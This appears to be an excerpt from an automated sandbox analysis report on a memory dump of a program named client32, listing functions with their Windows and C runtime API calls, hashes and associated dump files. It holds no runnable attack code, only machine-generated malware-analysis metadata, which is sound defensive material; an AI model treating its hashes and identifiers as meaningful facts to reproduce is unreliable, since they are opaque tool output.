Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1

Function 11060820 Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 110608C3
__CxxThrowException@8.LIBCMT ref: 110608D8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
Opcode Fuzzy Hash: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1

Function 1105F7C0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1105F806
_memmove.LIBCMT ref: 1105F811

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: ccf53dde5cade46ef2409f5895fb9eeb84ec94bd13c382f69bc417f02591f7e5
Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
Opcode Fuzzy Hash: ccf53dde5cade46ef2409f5895fb9eeb84ec94bd13c382f69bc417f02591f7e5
Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0

Function 110886C0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110886DF
InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection_memset
String ID:
API String ID: 453477542-0
Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90

Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
ExtractIconExA.SHELL32(?,00000000,00030325,00010327,00000001), ref: 11145068

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExtractFileIconModuleName
String ID:
API String ID: 3911389742-0
Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741

Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF

__lock_file.LIBCMT ref: 11164CBE

Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E

__fclose_nolock.LIBCMT ref: 11164CC9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46

Function 1117602D Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 11176045

Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9

__tzset_nolock.LIBCMT ref: 11176056

Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792

Function 11145A70 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7

Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA

GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
String ID:
API String ID: 3768737497-0
Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2

Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 11010B94

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90

Function 1100E300 Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1100E35A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 6a4558929192b251c5d08b5e804bdc9b61ce28f30961faaa03d70a9527164016
Instruction ID: 622d3808cb19fe645f7705ee54a54b225289d7132215defba9e18c77360d7652
Opcode Fuzzy Hash: 6a4558929192b251c5d08b5e804bdc9b61ce28f30961faaa03d70a9527164016
Instruction Fuzzy Hash: FE213C75E00269EBEB40CE69C88469D7BF5FF44360F14C1AAEC55EB241D774DE408B91

Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32 ref: 11143BF0

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754

Function 110FB470 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90

Function 11170FC4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007

Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780

Function 1105E820 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 1105E85D

Part of subcall function 1116450B: strtoxl.LIBCMT ref: 1116452C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __wcstoi64strtoxl
String ID:
API String ID: 910016052-0
Opcode ID: 8f26ef6fd018574ad29966309b08038d9b6a407cfa2a3251d72f04733a0025b5
Instruction ID: 23ac52cab648964c8bc4f85844fc967f5549f4a308fdde8bda903d18a29afeb2
